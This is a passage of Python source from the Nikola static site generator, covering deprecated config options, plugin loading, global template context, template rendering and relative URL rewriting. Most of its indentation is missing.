self.config['CONTENT_FOOTER'].langformat(self.config['CONTENT_FOOTER_FORMATS'])
# propagate USE_SLUGIFY
utils.USE_SLUGIFY = self.config['USE_SLUGIFY']
# Make sure we have pyphen installed if we are using it
if self.config.get('HYPHENATE') and pyphen is None:
            utils.LOGGER.warn('To use hyphenation, you have to install '
                              'the "pyphen" package.')
utils.LOGGER.warn('Setting HYPHENATE to False.')
self.config['HYPHENATE'] = False
# FIXME: Internally, we still use post_pages because it's a pain to change it
self.config['post_pages'] = []
for i1, i2, i3 in self.config['POSTS']:
self.config['post_pages'].append([i1, i2, i3, True])
for i1, i2, i3 in self.config['PAGES']:
self.config['post_pages'].append([i1, i2, i3, False])
# RSS_TEASERS has been replaced with FEED_TEASERS
# TODO: remove on v8
if 'RSS_TEASERS' in config:
utils.LOGGER.warn('The RSS_TEASERS option is deprecated, use FEED_TEASERS instead.')
if 'FEED_TEASERS' in config:
utils.LOGGER.warn('FEED_TEASERS conflicts with RSS_TEASERS, ignoring RSS_TEASERS.')
self.config['FEED_TEASERS'] = config['RSS_TEASERS']
# RSS_PLAIN has been replaced with FEED_PLAIN
# TODO: remove on v8
if 'RSS_PLAIN' in config:
utils.LOGGER.warn('The RSS_PLAIN option is deprecated, use FEED_PLAIN instead.')
if 'FEED_PLAIN' in config:
                utils.LOGGER.warn('FEED_PLAIN conflicts with RSS_PLAIN, ignoring RSS_PLAIN.')
self.config['FEED_PLAIN'] = config['RSS_PLAIN']
# RSS_LINKS_APPEND_QUERY has been replaced with FEED_LINKS_APPEND_QUERY
# TODO: remove on v8
if 'RSS_LINKS_APPEND_QUERY' in config:
utils.LOGGER.warn('The RSS_LINKS_APPEND_QUERY option is deprecated, use FEED_LINKS_APPEND_QUERY instead.')
            if 'FEED_LINKS_APPEND_QUERY' in config:
utils.LOGGER.warn('FEED_LINKS_APPEND_QUERY conflicts with RSS_LINKS_APPEND_QUERY, ignoring RSS_LINKS_APPEND_QUERY.')
self.config['FEED_LINKS_APPEND_QUERY'] = utils.TranslatableSetting('FEED_LINKS_APPEND_QUERY', config['RSS_LINKS_APPEND_QUERY'], self.config['TRANSLATIONS'])
# RSS_READ_MORE_LINK has been replaced with FEED_READ_MORE_LINK
# TODO: remove on v8
if 'RSS_READ_MORE_LINK' in config:
utils.LOGGER.warn('The RSS_READ_MORE_LINK option is deprecated, use FEED_READ_MORE_LINK instead.')
if 'FEED_READ_MORE_LINK' in config:
utils.LOGGER.warn('FEED_READ_MORE_LINK conflicts with RSS_READ_MORE_LINK, ignoring RSS_READ_MORE_LINK')
self.config['FEED_READ_MORE_LINK'] = utils.TranslatableSetting('FEED_READ_MORE_LINK', config['RSS_READ_MORE_LINK'], self.config['TRANSLATIONS'])
# RSS_PATH has been replaced with FEED_PATH
# TODO: remove on v8
if 'RSS_PATH' in config:
utils.LOGGER.warn('The RSS_PATH option is deprecated, use FEED_PATH instead.')
if 'FEED_PATH' in config:
utils.LOGGER.warn('FEED_PATH conflicts with RSS_PATH, ignoring RSS_PATH')
else:
self.config['FEED_PATH'] = config['RSS_PATH']
# DEFAULT_TRANSLATIONS_PATTERN was changed from "p.e.l" to "p.l.e"
# TODO: remove on v8
if 'TRANSLATIONS_PATTERN' not in self.config:
if len(self.config.get('TRANSLATIONS', {})) > 1:
utils.LOGGER.warn('You do not have a TRANSLATIONS_PATTERN set in your config, yet you have multiple languages.')
utils.LOGGER.warn('Setting TRANSLATIONS_PATTERN to the pre-v6 default ("{path}.{ext}.{lang}").')
utils.LOGGER.warn('Please add the proper pattern to your conf.py. (The new default in v7 is "{0}".)'.format(DEFAULT_TRANSLATIONS_PATTERN))
self.config['TRANSLATIONS_PATTERN'] = "{path}.{ext}.{lang}"
else:
# use v7 default there
self.config['TRANSLATIONS_PATTERN'] = DEFAULT_TRANSLATIONS_PATTERN
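        # Illustrative filenames for a hypothetical posts/foo.rst translated to 'es'
        # (the post name is invented; the patterns are the two defaults discussed above):
        #   "{path}.{ext}.{lang}" (pre-v6 default) -> posts/foo.rst.es
        #   "{path}.{lang}.{ext}" (v7 default)     -> posts/foo.es.rst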
# HIDE_SOURCELINK has been replaced with the inverted SHOW_SOURCELINK
# TODO: remove on v8
if 'HIDE_SOURCELINK' in config:
utils.LOGGER.warn('The HIDE_SOURCELINK option is deprecated, use SHOW_SOURCELINK instead.')
if 'SHOW_SOURCELINK' in config:
utils.LOGGER.warn('HIDE_SOURCELINK conflicts with SHOW_SOURCELINK, ignoring HIDE_SOURCELINK.')
self.config['SHOW_SOURCELINK'] = not config['HIDE_SOURCELINK']
# HIDE_UNTRANSLATED_POSTS has been replaced with the inverted SHOW_UNTRANSLATED_POSTS
# TODO: remove on v8
if 'HIDE_UNTRANSLATED_POSTS' in config:
utils.LOGGER.warn('The HIDE_UNTRANSLATED_POSTS option is deprecated, use SHOW_UNTRANSLATED_POSTS instead.')
if 'SHOW_UNTRANSLATED_POSTS' in config:
utils.LOGGER.warn('HIDE_UNTRANSLATED_POSTS conflicts with SHOW_UNTRANSLATED_POSTS, ignoring HIDE_UNTRANSLATED_POSTS.')
self.config['SHOW_UNTRANSLATED_POSTS'] = not config['HIDE_UNTRANSLATED_POSTS']
# READ_MORE_LINK has been split into INDEX_READ_MORE_LINK and RSS_READ_MORE_LINK
# TODO: remove on v8
if 'READ_MORE_LINK' in config:
utils.LOGGER.warn('The READ_MORE_LINK option is deprecated, use INDEX_READ_MORE_LINK and RSS_READ_MORE_LINK instead.')
if 'INDEX_READ_MORE_LINK' in config:
utils.LOGGER.warn('READ_MORE_LINK conflicts with INDEX_READ_MORE_LINK, ignoring READ_MORE_LINK.')
else:
self.config['INDEX_READ_MORE_LINK'] = utils.TranslatableSetting('INDEX_READ_MORE_LINK', config['READ_MORE_LINK'], self.config['TRANSLATIONS'])
if 'RSS_READ_MORE_LINK' in config:
utils.LOGGER.warn('READ_MORE_LINK conflicts with RSS_READ_MORE_LINK, ignoring READ_MORE_LINK.')
else:
self.config['RSS_READ_MORE_LINK'] = utils.TranslatableSetting('RSS_READ_MORE_LINK', config['READ_MORE_LINK'], self.config['TRANSLATIONS'])
# Moot.it renamed themselves to muut.io
# TODO: remove on v8?
if self.config.get('COMMENT_SYSTEM') == 'moot':
utils.LOGGER.warn('The moot comment system has been renamed to muut by the upstream. Setting COMMENT_SYSTEM to "muut".')
self.config['COMMENT_SYSTEM'] = 'muut'
# Disable RSS. For a successful disable, we must have both the option
# false and the plugin disabled through the official means.
if 'generate_rss' in self.config['DISABLED_PLUGINS'] and self.config['GENERATE_RSS'] is True:
self.config['GENERATE_RSS'] = False
if not self.config['GENERATE_RSS'] and 'generate_rss' not in self.config['DISABLED_PLUGINS']:
self.config['DISABLED_PLUGINS'].append('generate_rss')
# PRETTY_URLS defaults to enabling STRIP_INDEXES unless explicitly disabled
if self.config.get('PRETTY_URLS') and 'STRIP_INDEXES' not in config:
self.config['STRIP_INDEXES'] = True
if 'LISTINGS_FOLDER' in config:
if 'LISTINGS_FOLDERS' not in config:
utils.LOGGER.warn("The LISTINGS_FOLDER option is deprecated, use LISTINGS_FOLDERS instead.")
self.config['LISTINGS_FOLDERS'] = {self.config['LISTINGS_FOLDER']: self.config['LISTINGS_FOLDER']}
utils.LOGGER.warn("LISTINGS_FOLDERS = {0}".format(self.config['LISTINGS_FOLDERS']))
else:
utils.LOGGER.warn("Both LISTINGS_FOLDER and LISTINGS_FOLDERS are specified, ignoring LISTINGS_FOLDER.")
if 'GALLERY_PATH' in config:
if 'GALLERY_FOLDERS' not in config:
utils.LOGGER.warn("The GALLERY_PATH option is deprecated, use GALLERY_FOLDERS instead.")
self.config['GALLERY_FOLDERS'] = {self.config['GALLERY_PATH']: self.config['GALLERY_PATH']}
utils.LOGGER.warn("GALLERY_FOLDERS = {0}".format(self.config['GALLERY_FOLDERS']))
else:
utils.LOGGER.warn("Both GALLERY_PATH and GALLERY_FOLDERS are specified, ignoring GALLERY_PATH.")
if not self.config.get('COPY_SOURCES'):
self.config['SHOW_SOURCELINK'] = False
if self.config['CATEGORY_PATH']._inp is None:
self.config['CATEGORY_PATH'] = self.config['TAG_PATH']
if self.config['CATEGORY_PAGES_ARE_INDEXES'] is None:
self.config['CATEGORY_PAGES_ARE_INDEXES'] = self.config['TAG_PAGES_ARE_INDEXES']
self.default_lang = self.config['DEFAULT_LANG']
self.translations = self.config['TRANSLATIONS']
locale_fallback, locale_default, locales = sanitized_locales(
self.config.get('LOCALE_FALLBACK', None),
self.config.get('LOCALE_DEFAULT', None),
self.config.get('LOCALES', {}), self.translations)
utils.LocaleBorg.initialize(locales, self.default_lang)
# BASE_URL defaults to SITE_URL
if 'BASE_URL' not in self.config:
self.config['BASE_URL'] = self.config.get('SITE_URL')
# BASE_URL should *always* end in /
if self.config['BASE_URL'] and self.config['BASE_URL'][-1] != '/':
utils.LOGGER.warn("Your BASE_URL doesn't end in / -- adding it, but please fix it in your config file!")
self.config['BASE_URL'] += '/'
try:
_bnl = urlsplit(self.config['BASE_URL']).netloc
_bnl.encode('ascii')
urlsplit(self.config['SITE_URL']).netloc.encode('ascii')
except (UnicodeEncodeError, UnicodeDecodeError):
utils.LOGGER.error("Your BASE_URL or SITE_URL contains an IDN expressed in Unicode. Please convert it to Punycode.")
utils.LOGGER.error("Punycode of {}: {}".format(_bnl, _bnl.encode('idna')))
sys.exit(1)
# TODO: remove in v8
if not isinstance(self.config['DEPLOY_COMMANDS'], dict):
utils.LOGGER.warn("A single list as DEPLOY_COMMANDS is deprecated. DEPLOY_COMMANDS should be a dict, with deploy preset names as keys and lists of commands as values.")
utils.LOGGER.warn("The key `default` is used by `nikola deploy`:")
self.config['DEPLOY_COMMANDS'] = {'default': self.config['DEPLOY_COMMANDS']}
utils.LOGGER.warn("DEPLOY_COMMANDS = {0}".format(self.config['DEPLOY_COMMANDS']))
utils.LOGGER.info("(The above can be used with `nikola deploy` or `nikola deploy default`. Multiple presets are accepted.)")
# TODO: remove and change default in v8
if 'BLOG_TITLE' in config and 'WRITE_TAG_CLOUD' not in config:
# BLOG_TITLE is a hack, otherwise the warning would be displayed
# when conf.py does not exist
utils.LOGGER.warn("WRITE_TAG_CLOUD is not set in your config. Defaulting to True (== writing tag_cloud_data.json).")
utils.LOGGER.warn("Please explicitly add the setting to your conf.py with the desired value, as the setting will default to False in the future.")
# We use one global tzinfo object all over Nikola.
try:
self.tzinfo = dateutil.tz.gettz(self.config['TIMEZONE'])
except Exception as exc:
utils.LOGGER.warn("Error getting TZ: {}", exc)
self.tzinfo = dateutil.tz.gettz()
self.config['__tzinfo__'] = self.tzinfo
# Store raw compilers for internal use (need a copy for that)
self.config['_COMPILERS_RAW'] = {}
for k, v in self.config['COMPILERS'].items():
self.config['_COMPILERS_RAW'][k] = list(v)
compilers = defaultdict(set)
# Also add aliases for combinations with TRANSLATIONS_PATTERN
for compiler, exts in self.config['COMPILERS'].items():
for ext in exts:
compilers[compiler].add(ext)
for lang in self.config['TRANSLATIONS'].keys():
candidate = utils.get_translation_candidate(self.config, "f" + ext, lang)
compilers[compiler].add(candidate)
# Avoid redundant compilers
# Remove compilers that match nothing in POSTS/PAGES
# And put them in "bad compilers"
pp_exts = set([os.path.splitext(x[0])[1] for x in self.config['post_pages']])
self.config['COMPILERS'] = {}
self.disabled_compilers = {}
self.bad_compilers = set([])
for k, v in compilers.items():
if pp_exts.intersection(v):
self.config['COMPILERS'][k] = sorted(list(v))
else:
self.bad_compilers.add(k)
self.feedutil = FeedUtil(self)
self._set_global_context()
def init_plugins(self, commands_only=False):
"""Load plugins as needed."""
self.plugin_manager = PluginManager(categories_filter={
"Command": Command,
"Task": Task,
"LateTask": LateTask,
"TemplateSystem": TemplateSystem,
"PageCompiler": PageCompiler,
"TaskMultiplier": TaskMultiplier,
"CompilerExtension": CompilerExtension,
"MarkdownExtension": MarkdownExtension,
"RestExtension": RestExtension,
"SignalHandler": SignalHandler,
"ConfigPlugin": ConfigPlugin,
"PostScanner": PostScanner,
})
self.plugin_manager.getPluginLocator().setPluginInfoExtension('plugin')
extra_plugins_dirs = self.config['EXTRA_PLUGINS_DIRS']
if sys.version_info[0] == 3:
places = [
resource_filename('nikola', 'plugins'),
os.path.join(os.getcwd(), 'plugins'),
os.path.expanduser('~/.nikola/plugins'),
] + [path for path in extra_plugins_dirs if path]
else:
places = [
resource_filename('nikola', utils.sys_encode('plugins')),
os.path.join(os.getcwd(), utils.sys_encode('plugins')),
os.path.expanduser('~/.nikola/plugins'),
] + [utils.sys_encode(path) for path in extra_plugins_dirs if path]
self.plugin_manager.getPluginLocator().setPluginPlaces(places)
self.plugin_manager.locatePlugins()
bad_candidates = set([])
for p in self.plugin_manager._candidates:
if commands_only:
if p[-1].details.has_option('Nikola', 'plugincategory'):
# FIXME TemplateSystem should not be needed
if p[-1].details.get('Nikola', 'PluginCategory') not in {'Command', 'Template'}:
bad_candidates.add(p)
else: # Not commands-only
# Remove compilers we don't use
if p[-1].name in self.bad_compilers:
bad_candidates.add(p)
self.disabled_compilers[p[-1].name] = p
utils.LOGGER.debug('Not loading unneeded compiler {}', p[-1].name)
if p[-1].name not in self.config['COMPILERS'] and \
p[-1].details.has_option('Nikola', 'plugincategory') and p[-1].details.get('Nikola', 'PluginCategory') == 'Compiler':
bad_candidates.add(p)
self.disabled_compilers[p[-1].name] = p
utils.LOGGER.debug('Not loading unneeded compiler {}', p[-1].name)
# Remove blacklisted plugins
if p[-1].name in self.config['DISABLED_PLUGINS']:
bad_candidates.add(p)
utils.LOGGER.debug('Not loading disabled plugin {}', p[-1].name)
# Remove compiler extensions we don't need
if p[-1].details.has_option('Nikola', 'compiler') and p[-1].details.get('Nikola', 'compiler') in self.disabled_compilers:
bad_candidates.add(p)
utils.LOGGER.debug('Not loading compiler extension {}', p[-1].name)
self.plugin_manager._candidates = list(set(self.plugin_manager._candidates) - bad_candidates)
self.plugin_manager.loadPlugins()
self._activate_plugins_of_category("SignalHandler")
# Emit signal for SignalHandlers which need to start running immediately.
signal('sighandlers_loaded').send(self)
self._commands = {}
command_plugins = self._activate_plugins_of_category("Command")
for plugin_info in command_plugins:
plugin_info.plugin_object.short_help = plugin_info.description
self._commands[plugin_info.name] = plugin_info.plugin_object
self._activate_plugins_of_category("PostScanner")
self._activate_plugins_of_category("Task")
self._activate_plugins_of_category("LateTask")
self._activate_plugins_of_category("TaskMultiplier")
# Activate all required compiler plugins
self.compiler_extensions = self._activate_plugins_of_category("CompilerExtension")
for plugin_info in self.plugin_manager.getPluginsOfCategory("PageCompiler"):
if plugin_info.name in self.config["COMPILERS"].keys():
self.plugin_manager.activatePluginByName(plugin_info.name)
plugin_info.plugin_object.set_site(self)
# Load compiler plugins
self.compilers = {}
self.inverse_compilers = {}
for plugin_info in self.plugin_manager.getPluginsOfCategory(
"PageCompiler"):
self.compilers[plugin_info.name] = \
plugin_info.plugin_object
self._activate_plugins_of_category("ConfigPlugin")
signal('configured').send(self)
def _set_global_context(self):
"""Create global context from configuration."""
self._GLOBAL_CONTEXT['url_type'] = self.config['URL_TYPE']
self._GLOBAL_CONTEXT['timezone'] = self.tzinfo
self._GLOBAL_CONTEXT['_link'] = self.link
try:
self._GLOBAL_CONTEXT['set_locale'] = utils.LocaleBorg().set_locale
except utils.LocaleBorgUninitializedException:
self._GLOBAL_CONTEXT['set_locale'] = None
self._GLOBAL_CONTEXT['rel_link'] = self.rel_link
self._GLOBAL_CONTEXT['abs_link'] = self.abs_link
self._GLOBAL_CONTEXT['exists'] = self.file_exists
self._GLOBAL_CONTEXT['SLUG_AUTHOR_PATH'] = self.config['SLUG_AUTHOR_PATH']
self._GLOBAL_CONTEXT['SLUG_TAG_PATH'] = self.config['SLUG_TAG_PATH']
self._GLOBAL_CONTEXT['annotations'] = self.config['ANNOTATIONS']
self._GLOBAL_CONTEXT['index_display_post_count'] = self.config[
'INDEX_DISPLAY_POST_COUNT']
self._GLOBAL_CONTEXT['index_file'] = self.config['INDEX_FILE']
self._GLOBAL_CONTEXT['use_base_tag'] = self.config['USE_BASE_TAG']
self._GLOBAL_CONTEXT['use_bundles'] = self.config['USE_BUNDLES']
self._GLOBAL_CONTEXT['use_cdn'] = self.config.get("USE_CDN")
self._GLOBAL_CONTEXT['theme_color'] = self.config.get("THEME_COLOR")
self._GLOBAL_CONTEXT['favicons'] = self.config['FAVICONS']
self._GLOBAL_CONTEXT['date_format'] = self.config.get('DATE_FORMAT')
self._GLOBAL_CONTEXT['blog_author'] = self.config.get('BLOG_AUTHOR')
self._GLOBAL_CONTEXT['blog_title'] = self.config.get('BLOG_TITLE')
self._GLOBAL_CONTEXT['show_blog_title'] = self.config.get('SHOW_BLOG_TITLE')
self._GLOBAL_CONTEXT['logo_url'] = self.config.get('LOGO_URL')
self._GLOBAL_CONTEXT['blog_description'] = self.config.get('BLOG_DESCRIPTION')
self._GLOBAL_CONTEXT['color_hsl_adjust_hex'] = utils.color_hsl_adjust_hex
self._GLOBAL_CONTEXT['colorize_str_from_base_color'] = utils.colorize_str_from_base_color
# TODO: remove in v8
self._GLOBAL_CONTEXT['blog_desc'] = self.config.get('BLOG_DESCRIPTION')
self._GLOBAL_CONTEXT['blog_url'] = self.config.get('SITE_URL')
self._GLOBAL_CONTEXT['template_hooks'] = self.template_hooks
self._GLOBAL_CONTEXT['body_end'] = self.config.get('BODY_END')
self._GLOBAL_CONTEXT['social_buttons_code'] = self.config.get('SOCIAL_BUTTONS_CODE')
self._GLOBAL_CONTEXT['translations'] = self.config.get('TRANSLATIONS')
self._GLOBAL_CONTEXT['license'] = self.config.get('LICENSE')
self._GLOBAL_CONTEXT['search_form'] = self.config.get('SEARCH_FORM')
self._GLOBAL_CONTEXT['comment_system'] = self.config.get('COMMENT_SYSTEM')
self._GLOBAL_CONTEXT['comment_system_id'] = self.config.get('COMMENT_SYSTEM_ID')
self._GLOBAL_CONTEXT['site_has_comments'] = bool(self.config.get('COMMENT_SYSTEM'))
self._GLOBAL_CONTEXT['mathjax_config'] = self.config.get(
'MATHJAX_CONFIG')
self._GLOBAL_CONTEXT['use_katex'] = self.config.get('USE_KATEX')
self._GLOBAL_CONTEXT['subtheme'] = self.config.get('THEME_REVEAL_CONFIG_SUBTHEME')
self._GLOBAL_CONTEXT['transition'] = self.config.get('THEME_REVEAL_CONFIG_TRANSITION')
self._GLOBAL_CONTEXT['content_footer'] = self.config.get(
'CONTENT_FOOTER')
self._GLOBAL_CONTEXT['generate_atom'] = self.config.get('GENERATE_ATOM')
self._GLOBAL_CONTEXT['generate_rss'] = self.config.get('GENERATE_RSS')
self._GLOBAL_CONTEXT['rss_path'] = self.config.get('FEED_PATH')
self._GLOBAL_CONTEXT['rss_link'] = self.config.get('RSS_LINK')
self._GLOBAL_CONTEXT['navigation_links'] = self.config.get('NAVIGATION_LINKS')
self._GLOBAL_CONTEXT['use_open_graph'] = self.config.get(
'USE_OPEN_GRAPH', True)
self._GLOBAL_CONTEXT['twitter_card'] = self.config.get(
'TWITTER_CARD', {})
self._GLOBAL_CONTEXT['hide_sourcelink'] = not self.config.get(
'SHOW_SOURCELINK')
self._GLOBAL_CONTEXT['show_sourcelink'] = self.config.get(
'SHOW_SOURCELINK')
self._GLOBAL_CONTEXT['extra_head_data'] = self.config.get('EXTRA_HEAD_DATA')
self._GLOBAL_CONTEXT['date_fanciness'] = self.config.get('DATE_FANCINESS')
self._GLOBAL_CONTEXT['js_date_format'] = self.config.get('JS_DATE_FORMAT')
self._GLOBAL_CONTEXT['colorbox_locales'] = LEGAL_VALUES['COLORBOX_LOCALES']
self._GLOBAL_CONTEXT['momentjs_locales'] = LEGAL_VALUES['MOMENTJS_LOCALES']
self._GLOBAL_CONTEXT['hidden_tags'] = self.config.get('HIDDEN_TAGS')
self._GLOBAL_CONTEXT['hidden_categories'] = self.config.get('HIDDEN_CATEGORIES')
self._GLOBAL_CONTEXT['hidden_authors'] = self.config.get('HIDDEN_AUTHORS')
self._GLOBAL_CONTEXT['url_replacer'] = self.url_replacer
self._GLOBAL_CONTEXT['posts_sections'] = self.config.get('POSTS_SECTIONS')
self._GLOBAL_CONTEXT['posts_section_are_indexes'] = self.config.get('POSTS_SECTION_ARE_INDEXES')
self._GLOBAL_CONTEXT['posts_section_colors'] = self.config.get('POSTS_SECTION_COLORS')
self._GLOBAL_CONTEXT['posts_section_descriptions'] = self.config.get('POSTS_SECTION_DESCRIPTIONS')
self._GLOBAL_CONTEXT['posts_section_from_meta'] = self.config.get('POSTS_SECTION_FROM_META')
self._GLOBAL_CONTEXT['posts_section_name'] = self.config.get('POSTS_SECTION_NAME')
self._GLOBAL_CONTEXT['posts_section_title'] = self.config.get('POSTS_SECTION_TITLE')
# IPython theme configuration. If a website has ipynb enabled in post_pages
# we should enable the IPython CSS (leaving that up to the theme itself).
self._GLOBAL_CONTEXT['needs_ipython_css'] = 'ipynb' in self.config['COMPILERS']
self._GLOBAL_CONTEXT.update(self.config.get('GLOBAL_CONTEXT', {}))
def _activate_plugins_of_category(self, category):
"""Activate all the plugins of a given category and return them."""
# this code duplicated in tests/base.py
plugins = []
for plugin_info in self.plugin_manager.getPluginsOfCategory(category):
self.plugin_manager.activatePluginByName(plugin_info.name)
plugin_info.plugin_object.set_site(self)
plugins.append(plugin_info)
return plugins
def _get_themes(self):
if self._THEMES is None:
try:
self._THEMES = utils.get_theme_chain(self.config['THEME'])
except Exception:
utils.LOGGER.warn('''Cannot load theme "{0}", using 'bootstrap3' instead.'''.format(self.config['THEME']))
self.config['THEME'] = 'bootstrap3'
return self._get_themes()
# Check consistency of USE_CDN and the current THEME (Issue #386)
if self.config['USE_CDN'] and self.config['USE_CDN_WARNING']:
bootstrap_path = utils.get_asset_path(os.path.join(
'assets', 'css', 'bootstrap.min.css'), self._THEMES)
if bootstrap_path and bootstrap_path.split(os.sep)[-4] not in ['bootstrap', 'bootstrap3']:
utils.LOGGER.warn('The USE_CDN option may be incompatible with your theme, because it uses a hosted version of bootstrap.')
return self._THEMES
THEMES = property(_get_themes)
def _get_messages(self):
try:
return utils.load_messages(self.THEMES,
self.translations,
self.default_lang)
except utils.LanguageNotFoundError as e:
utils.LOGGER.error('''Cannot load language "{0}". Please make sure it is supported by Nikola itself, or that you have the appropriate messages files in your themes.'''.format(e.lang))
sys.exit(1)
MESSAGES = property(_get_messages)
def _get_global_context(self):
"""Initialize some parts of GLOBAL_CONTEXT only when it's queried."""
if 'messages' not in self._GLOBAL_CONTEXT:
self._GLOBAL_CONTEXT['messages'] = self.MESSAGES
if 'has_custom_css' not in self._GLOBAL_CONTEXT:
# check if custom css exist and is not empty
custom_css_path = utils.get_asset_path(
'assets/css/custom.css',
self.THEMES,
self.config['FILES_FOLDERS']
)
if custom_css_path and self.file_exists(custom_css_path, not_empty=True):
self._GLOBAL_CONTEXT['has_custom_css'] = True
else:
self._GLOBAL_CONTEXT['has_custom_css'] = False
return self._GLOBAL_CONTEXT
GLOBAL_CONTEXT = property(_get_global_context)
def _get_template_system(self):
if self._template_system is None:
# Load template plugin
template_sys_name = utils.get_template_engine(self.THEMES)
pi = self.plugin_manager.getPluginByName(
template_sys_name, "TemplateSystem")
if pi is None:
sys.stderr.write("Error loading {0} template system "
"plugin\n".format(template_sys_name))
sys.exit(1)
self._template_system = pi.plugin_object
lookup_dirs = ['templates'] + [os.path.join(utils.get_theme_path(name), "templates")
for name in self.THEMES]
self._template_system.set_directories(lookup_dirs,
self.config['CACHE_FOLDER'])
self._template_system.set_site(self)
return self._template_system
template_system = property(_get_template_system)
def get_compiler(self, source_name):
"""Get the correct compiler for a post from `conf.COMPILERS`.
To make things easier for users, the mapping in conf.py is
compiler->[extensions], although this is less convenient for us.
The majority of this function is reversing that dictionary and error checking.
"""
ext = os.path.splitext(source_name)[1]
try:
compile_html = self.inverse_compilers[ext]
except KeyError:
# Find the correct compiler for this files extension
lang_exts_tab = list(self.config['COMPILERS'].items())
langs = [lang for lang, exts in lang_exts_tab if ext in exts or
len([ext_ for ext_ in exts if source_name.endswith(ext_)]) > 0]
if len(langs) != 1:
if len(set(langs)) > 1:
exit("Your file extension->compiler definition is "
"ambiguous.\nPlease remove one of the file extensions "
"from 'COMPILERS' in conf.py\n(The error is in "
"one of {0})".format(', '.join(langs)))
elif len(langs) > 1:
langs = langs[:1]
else:
exit("COMPILERS in conf.py does not tell me how to "
"handle '{0}' extensions.".format(ext))
lang = langs[0]
try:
compile_html = self.compilers[lang]
except KeyError:
exit("Cannot find '{0}' compiler; it might require an extra plugin -- do you have it installed?".format(lang))
self.inverse_compilers[ext] = compile_html
return compile_html
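    # Illustrative sketch, not part of the original Nikola source: with a
    # hypothetical conf.py mapping such as
    #     COMPILERS = {"rest": ('.rst', '.txt'), "markdown": ('.md',)}
    # a call like self.get_compiler('posts/hello.rst') would resolve the
    # 'rest' compiler plugin and cache it under self.inverse_compilers['.rst'].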
def render_template(self, template_name, output_name, context):
"""Render a template with the global context.
If ``output_name`` is None, will return a string and all URL
normalization will be ignored (including the link:// scheme).
If ``output_name`` is a string, URLs will be normalized and
the resultant HTML will be saved to the named file (path must
start with OUTPUT_FOLDER).
"""
local_context = {}
local_context["template_name"] = template_name
local_context.update(self.GLOBAL_CONTEXT)
local_context.update(context)
for k in self._GLOBAL_CONTEXT_TRANSLATABLE:
local_context[k] = local_context[k](local_context['lang'])
local_context['is_rtl'] = local_context['lang'] in LEGAL_VALUES['RTL_LANGUAGES']
# string, arguments
local_context["formatmsg"] = lambda s, *a: s % a
for h in local_context['template_hooks'].values():
h.context = context
for func in self.config['GLOBAL_CONTEXT_FILLER']:
func(local_context, template_name)
data = self.template_system.render_template(
template_name, None, local_context)
if output_name is None:
return data
assert output_name.startswith(
self.config["OUTPUT_FOLDER"])
url_part = output_name[len(self.config["OUTPUT_FOLDER"]) + 1:]
# Treat our site as if output/ is "/" and then make all URLs relative,
# making the site "relocatable"
src = os.sep + url_part
src = os.path.normpath(src)
# The os.sep is because normpath will change "/" to "\" on windows
src = "/".join(src.split(os.sep))
utils.makedirs(os.path.dirname(output_name))
parser = lxml.html.HTMLParser(remove_blank_text=True)
doc = html5lib.html5parser.parse(data, treebuilder='lxml',
namespaceHTMLElements=False)
doc = lxml.html.document_fromstring(lxml.html.tostring(doc), parser)
self.rewrite_links(doc, src, context['lang'])
data = b'<!DOCTYPE html>\n' + lxml.html.tostring(doc, encoding='utf8', method='html', pretty_print=True)
with open(output_name, "wb+") as post_file:
post_file.write(data)
def rewrite_links(self, doc, src, lang):
"""Replace links in document to point to the right places."""
# First let lxml replace most of them
doc.rewrite_links(lambda dst: self.url_replacer(src, dst, lang), resolve_base_href=False)
# lxml ignores srcset in img and source elements, so do that by hand
objs = list(doc.xpath('(*//img|*//source)'))
for obj in objs:
if 'srcset' in obj.attrib:
urls = [u.strip() for u in obj.attrib['srcset'].split(',')]
urls = [self.url_replacer(src, dst, lang) for dst in urls]
obj.set('srcset', ', '.join(urls))
def url_replacer(self, src, dst, lang=None, url_type=None):
"""Mangle URLs.
* Replaces link:// URLs with real links
* Makes dst relative to src
* Leaves fragments unchanged
* Leaves full URLs unchanged
* Avoids empty links
src is the URL where this link is used
dst is the link to be mangled
lang is used for language-sensitive URLs in link://
url_type is used to determine final link appearance, defaulting to URL_TYPE from config
"""
parsed_src = urlsplit(src)
src_elems = parsed_src.path.split('/')[1:]
dst_url = urlparse(dst)
if lang is None:
lang = self.default_lang
if url_type is None:
url_type = self.config.get('URL_TYPE')
if dst_url.scheme and dst_url.scheme not in ['http', 'https', 'link']:
return dst
# Refuse to replace links that are full URLs.
if dst_url.netloc:
if dst_url.scheme == 'link': # Magic link
dst = self.link(dst_url.netloc, dst_url.path.lstrip('/'), lang)
# Assuming the site is served over one of these, and
# since those are the only URLs we want to rewrite...
else:
if '%' in dst_url.netloc:
# convert lxml percent-encoded garbage to punycode
nl = unquote(dst_url.netloc)
try:
nl = nl.decode('utf-8')
except AttributeError:
# python 3: already unicode
pass
nl = nl.encode('idna')
if isinstance(nl, utils.bytes_str):
nl = nl.decode('latin-1') # so idna stays unchanged
dst = urlunsplit((dst_url.scheme,
nl,
dst_url.path,
dst_url.query,
dst_url.fragment))
return dst
elif dst_url.scheme == 'link': # Magic absolute path link:
dst = dst_url.path
return dst
# Refuse to replace links that consist of a fragment only
if ((not dst_url.scheme) and (not dst_url.netloc) and
(not dst_url.path) and (not dst_url.params) and
(not dst_url.query) and dst_url.fragment):
return dst
# Normalize
dst = urljoin(src, dst)
# Avoid empty links.
if src == dst:
if url_type == 'absolute':
dst = urljoin(self.config['BASE_URL'], dst.lstrip('/'))
return dst
elif url_type == 'full_path':
dst = urljoin(self.config['BASE_URL'], dst.lstrip('/'))
return urlparse(dst).path
else:
return "#"
# Check that link can be made relative, otherwise return dest
parsed_dst = urlsplit(dst)
if parsed_src[:2] != parsed_dst[:2]:
if url_type == 'absolute':
dst = urljoin(self.config['BASE_URL'], dst)
return dst
if url_type in ('full_path', 'absolute'):
dst = urljoin(self.config['BASE_URL'], dst.lstrip('/'))
if url_type == 'full_path':
parsed = urlparse(urljoin(self.config['BASE_URL'], dst.lstrip('/')))
if parsed.fragment:
dst = '{0}#{1}'.format(parsed.path, parsed.fragment)
else:
dst = parsed.path
return dst
# Now both paths are on the same site and absolute
dst_elems = parsed_dst.path.split('/')[1:]
i = 0
for (i, s), d in zip(enumerate(src_elems), dst_elems):
if s != d:
break
# Now i is the longest common prefix
result = '/'.join(['..'] * (len(src_elems) - i - 1) + dst_elems[i:])
if not result:
result = "."
# Don't forget the query part of the link
if parsed_dst.query:
result += "?" + parsed_dst.query
# Don't forget the fragment (anchor) part of the link
if parsed_dst.fragment:
result += "#" + parsed_dst.fragment
assert result, (src, dst, i, src_elems, dst_elems)
return result
